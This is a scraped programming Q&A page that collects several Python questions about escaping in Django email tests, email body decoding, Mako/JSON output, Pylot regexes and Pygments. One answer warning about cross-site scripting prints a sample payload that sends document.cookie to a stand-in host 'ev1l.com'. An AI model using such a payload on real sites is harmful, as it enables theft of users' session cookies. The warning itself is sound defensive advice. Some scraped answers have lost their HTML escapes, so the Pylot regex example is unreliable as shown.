How to test content of a Django email?

How to test content of a Django email? - python

I'm new to Django and am trying to use unittest to check if there's some text in an outbound email:
class test_send_daily_email(TestCase):
def test_success(self):
self.assertIn(mail.outbox[0].body, "My email's contents")
However, I'm having an issue with mail.outbox[0].body. It will output \nMy email&#39s contents\n and won't match the test text.
I've attempted a few different fixes with no luck:
str(mail.outbox[0].body).rstrip() - returns an idential string
str(mail.outbox[0].body).decode('utf-8') - no attribute decode
Apologies, I know this must be a trivial task. In Rails I would use something like Nokogiri to parse the text. What's the right way to parse this in Django? I wasn't able to find instructions on this in the documentation.

It depends on the actual content of your mail (plain or html) but the easy way is to also encode the string you are testing against.
# if you are testing HTML content
self.assertTextInHTML("My email's contents", mail.outbox[0].body)
# the string may need escaping the same way django escapes
from django.utils.html import escape
self.assertIn(escape("My email's contents"), mail.outbox[0].body)

Related

Why is my script is not consistently detecting contents in email bodies?

I've setup a sieve filter which invokes a Python script when it detects a postal service email about package deliveries. The sieve filter works fine and invokes the Python script reliably. However, the Python script does not reliably do its work. Here is my Python script, reduced to the relevant parts:
#!/usr/bin/env python3
import sys
from email import message_from_file
from email import policy
import subprocess
msg = message_from_file(sys.stdin, policy=policy.default)
if " out for delivery " in str(msg.get_body(("html"))):
print("It is out for delivery")
I get email messages that have the string " out for delivery " in the body of the message but the script does not print out "It is out for delivery". I've already checked the HTML in the messages to make sure it is consistent and it is 100% consistent. The frustrating thing though is that if I save the message from my mail reader that should have triggered the script, and I feed it to sieve-test manually, then the script works 100% of the time!
How come my script never works during actual mail delivery but always works whenever I test it with sieve-test?
Notes:
The email contains only a single part, which is HTML, so I have to use the HTML part.
I know I can do a body test in sieve. I'm doing it in Python for reasons outside the scope of this question.

The problem is that you use str(msg.get_body(("html"))), which is unreliable for your purpose. What you get is the body of the message as a string, but it is encoded for inclusion inside an email message. You're dealing with MIME part, which may be encoded with quoted-printable, in which case the string you test for (" out for delivery ") could be split across multiple lines when encoded. The string against which you test could have the text you are looking for encoded like this:
[other text] out for=
delivery [more text]
The = sign is part of the encoding and indicates that the newline that follows is there because of the encoding rather than because it was there prior to encoding.
Ok, but why does it always work when you use sieve-test? What happens is that your mail reader encodes the message differently, and the way it encodes it, the text you are looking for is not split across lines, and your script works! It is perfectly correct for the mail reader to save the message with a different encoding so long as once the email is decoded its content has not changed.
What you should do is use msg.get_body(("html")).get_content(). This gets the body in decoded form exactly byte-for-byte the same as when the postal service composed the email.

" appears in JSONEncoder output, input is Python list of strings

I'm reading a text file, splitting it on \n and putting the results in a Python list.
I'm then using JSONEncoder().encode(mylist), but the result throws errors as it produces the javascript:
var jslist = ["List item 1", "List item 2"]
I'm guessing switching to single quotes would solve this, but it's unclear how to force JSONEncoder/python to use one or the other.
Update: The context is a pyramid application, here's the end of the function (components is the name of the list:
return {'components': JSONEncoder().encode(components)}
and then in the mako template:
var components = ${components};
which is being replaced as above.

mako is escaping your strings because it's a sane default for most purposes. You can turn off the escaping on a case-by-case basis:
${components | n}

If you are embedding the JSON on a HTML page, beware. As Mako does not know about script tags, so it goes on to escape the string using the standard escapes. However a <script> tag has different escaping rules. Notably, NOT escaping makes your site prone to Cross-Site Scripting attacks if the JSON contains user-generated data. Consider the following info in User-editable field (user.name)
user.name = "</script><script language='javascript'>" +
"document.write('<img src=\'http://ev1l.com/stealcookies/?'" +
"+ document.cookie + '/>');</script><script language='vbscript'>"
Alas, Python JSON encoder does not have an option for safely encoding JSON so that it
is embeddable within HTML - or even Javascript (a bug has been entered into Python bug db). Meanwhile you should use ensure_ascii=True + replace all '<' with '\\u003c' to avoid hacking by malicious users.

Problems writing a regex in testcases.xml of pylot

I have to verify a list of strings to be present in a response to a soap request. I am using pylot testing tool. I know that if I use a string inside <verify>abcd</verify>element it works fine. I have to use regex though and I seem to face problems with the same since I am not good with regex.
I have to verify if <TestName>Abcd Hijk</TestName> is present in my response for the request sent.
Following is my attempt to write the regex inside testcases.xml
<verify>[.TestName.][\w][./TestName.]</verify>
Is this the correct way to write a regex in testcases.xml file? I want to exactly verify the tagnames and its values mentioned above.
When I run the tool, it gives me no errors. But If I change the the characters to <verify>[.TesttttName.][\w][./TestttttName.]</verify> and run the tool, it still run without giving errors. While this should be a failed run since no tags like the one mentioned is present in the response!
Could someone please tell me what I am doing wrong in the regex here?
Any help would be appreciated. Thanks!

The regex used should be like the following.
<verify>&lt;TestName&gt;[\w\s]+&lt;/TestName&gt;</verify>
The reason being, Pylot has the response content in the form of a text i.e, [the above part in the response would be like the following]
.......<TestName>ABCd Hijk</TestName>.....
What Pylot does is, when it parses element in the Testcases.xml, it takes the value of the element in TEXT format. Then it searches for the 'verify text' in the response which it got from the request.
Hence whenever we would want to verify anything in Pylot using regex we need to put the regex in the above format so that it gives the required results.
Note: One has to be careful of the response format received. To view the response got from the request, Enable the Log Messages on the tool or if you want to view the response on the console, edit the tools engine.py module and insert print statements.

The raw regular expression (no XML escape). I assume you want to accept English alphabet a-zA-Z, digits 0-9, underscore _ and space characters (space, new line, carriage return, and a few others - check documentation for details).
<TestName>[\w\s]+</TestName>
You need to escape the < and > to specify inside <verify> tag:
<TestName>[\w\s]+</TestName>

Django/Textile/Pygments: " ' > being escaped

I have a blog written in django that I am attempting to add syntax highlighting to. The posts are written and stored in the database as textile markup. Here is how they are supposed to be rendered via template engine:
{{ body|textile|pygmentize|safe }}
It renders all the HTML correctly and the code gets highlighted, but some characters within the code blocks are being escaped. Specifically double quotes, single quotes, and greater than signs.
Here is the Pygments filter I am using: http://djangosnippets.org/snippets/416/
I'm not sure which filter is actually putting the escaped characters in there or how to make it stop that. Any suggestions?

shameless plug to me answering this on another page:
https://stackoverflow.com/a/10138569/1224926
the problem is beautifulsoup (rightly) assumes code is unsafe. but if you parse it into a tree, and pass that in, it works. So your line:
code.replaceWith(highlight(code.string, lexer, HtmlFormatter()))
should become:
code.replaceWith(BeautifulSoup(highlight(code.string, lexer, HtmlFormatter())))
and you get what you would expect.

Searching for specific HTML string using Python

What modules would be the best to write a python program that searches through hundreds of html documents and deletes a certain string of html that is given.
For instance, if I have an html doc that has Test and I want to delete this out of every html page that has it.
Any help is much appreciated, and I don't need someone to write the program for me, just a helpful point in the right direction.

If the string you are searching for will be in the HTML literally, then simple string replacement will be fine:
old_html = open(html_file).read()
new_html = old_html.replace(my_string, "")
if new_html != old_html:
open(html_file, "w").write(new_html)
As an example of the string not being in the HTML literally, suppose you are looking for "Test" as you said. Do you want it to match these snippets of HTML?:
<a href='test.html'>Test</a>
<A HREF='test.html'>Test</A>
Test
Test
and so on: the "same" HTML can be expressed in many different ways. If you know the precise characters used in the HTML, then simple string replacement is fine. If you need to match at an HTML semantic level, then you'll need to use more advanced tools like BeautifulSoup, but then you'll also have potentially very different HTML output than you started with, even in the sections not affected by the deletion, because the entire file will have been parsed and reconstituted.
To execute code over many files, you'll find os.path.walk useful for finding files in a tree, or glob.glob for matching filenames to shell-like wildcard patterns.

BeautifulSoup or lxml.

htmllib
This module defines a class which can serve as a base for parsing text
files formatted in the HyperText Mark-up Language (HTML). The class is
not directly concerned with I/O — it must be provided with input in
string form via a method, and makes calls to methods of a “formatter”
object in order to produce output. The HTMLParser class is designed to
be used as a base class for other classes in order to add
functionality, and allows most of its methods to be extended or
overridden. In turn, this class is derived from and extends the
SGMLParser class defined in module sgmllib. The HTMLParser
implementation supports the HTML 2.0 language as described in RFC
1866.

Develop Reference

Python is a programming language that lets you work quickly and integrate systems more effectively.

How to test content of a Django email? - python

Related

Why is my script is not consistently detecting contents in email bodies?

" appears in JSONEncoder output, input is Python list of strings

Problems writing a regex in testcases.xml of pylot

Django/Textile/Pygments: " ' > being escaped

Searching for specific HTML string using Python

Categories

Resources